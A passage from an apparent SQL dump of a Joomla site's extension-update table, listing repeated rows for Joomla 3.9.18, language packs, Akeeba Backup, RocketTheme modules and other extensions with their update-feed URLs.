',''),(15656,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15657,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15658,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15659,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15660,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15661,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15662,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15663,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15664,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15665,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15666,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15667,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15668,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15669,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15670,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15671,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15672,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15673,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15674,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15675,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15676,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15677,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15678,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15679,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15680,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15681,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15682,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15683,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15684,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15685,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15686,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15687,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15688,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15689,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15690,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15691,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15692,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15693,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15694,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15695,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15696,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15697,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15698,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15699,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15700,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15701,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15702,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15703,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15704,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15705,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15706,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15707,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15708,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15709,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15710,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.8','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15711,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15712,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15713,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15714,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15715,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15716,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15717,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15718,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15719,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15720,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15721,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15722,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15723,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15724,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15725,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15726,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15727,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15728,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15729,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15730,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15731,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15732,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(15733,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(15734,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(15735,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(15736,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(15737,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(15738,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(15739,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(15740,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15741,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15742,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15743,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15744,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15745,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15746,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15747,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15748,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15749,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15750,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15751,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15752,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15753,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15754,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15755,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15756,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15757,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15758,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15759,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15760,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15761,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15762,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15763,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15764,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15765,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15766,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15767,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15768,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.8','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15769,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15770,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15771,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15772,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15773,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15774,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15775,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15776,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15777,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15778,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15779,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15780,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15781,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15782,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15783,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15784,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15785,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15786,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15787,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15788,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15789,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15790,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(15791,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(15792,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(15794,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15795,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15796,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15797,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15798,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15799,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15800,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15801,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15802,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15803,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15804,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15805,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15806,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15807,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15808,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15809,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15810,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15811,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15812,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15813,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15814,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15815,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15816,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15817,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15818,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15819,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15820,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15821,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15822,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15823,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15824,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15825,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15826,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15827,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15828,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15829,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15830,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15831,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15832,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15833,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15834,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15835,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15836,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15837,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15838,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15839,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15840,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15841,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15842,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15843,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15844,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15845,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15846,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15847,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15848,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15849,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15850,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15851,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15852,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15853,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15854,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15855,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15856,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15857,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15858,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15859,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15860,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15861,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.2','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15862,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15863,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15864,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15865,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15866,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15867,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15868,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15869,3,0,'English 